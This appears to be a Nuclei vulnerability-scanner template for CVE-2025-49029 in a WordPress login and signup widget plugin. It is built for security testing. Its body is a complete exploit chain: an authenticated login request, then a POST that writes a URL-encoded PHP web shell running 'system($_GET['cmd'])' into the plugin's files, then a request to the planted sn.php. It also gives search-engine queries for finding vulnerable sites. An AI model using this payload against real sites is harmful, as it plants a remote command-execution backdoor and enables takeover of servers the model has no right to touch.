漏洞描述
Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection.This issue affects Custom Login And Signup Widget: from n/a through 1.0
id: CVE-2025-49029
info:
name: WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution
author: pussycat0x
severity: high
description: |
Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection.This issue affects Custom Login And Signup Widget: from n/a through 1.0
reference:
- https://github.com/Nxploited/CVE-2025-49029
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-login-and-signup-widget/custom-login-and-signup-widget-10-authenticated-administrator-remote-code-execution
classification:
epss-score: 0.00268
epss-percentile: 0.50173
metadata:
verified: true
max-request: 3
publicwww-query: "/wp-content/plugins/custom-login-and-signup-widget/"
fofa-query: body="/wp-content/plugins/custom-login-and-signup-widget/"
tags: cve,cve2025,wordpress,intrusive,plugin,wordpress-custom-login,file-upload
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
POST /wp-admin/options-general.php?page=custom-login-and-signup-widget&editbn1=yes HTTP/1.1
Host: {{Hostname}}
Referer: {{RootURL}}/wp-admin/options-general.php?page=custom-login-and-signup-widget
Content-Type: application/x-www-form-urlencoded
Origin: {{RootURL}}
text=%3C%3Fphp+if%28isset%28%24_GET%5B%27cmd%27%5D%29%29+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E&submit=Submit
- |
GET /wp-content/plugins/custom-login-and-signup-widget/content/sn.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains(body_2, "custom-login-and-signup-widget")
- status_code_3 == 500
condition: and
# digest: 490a0046304402206919f31c78e11bf0d69283ba6f91935018d94ad73a4fb31888af83822315492302204202b97520465879d0295d95ee6e69f211c8664d92d0600f6ad85d6d5abd87dd:922c64590222798bb761d5b6d8e72950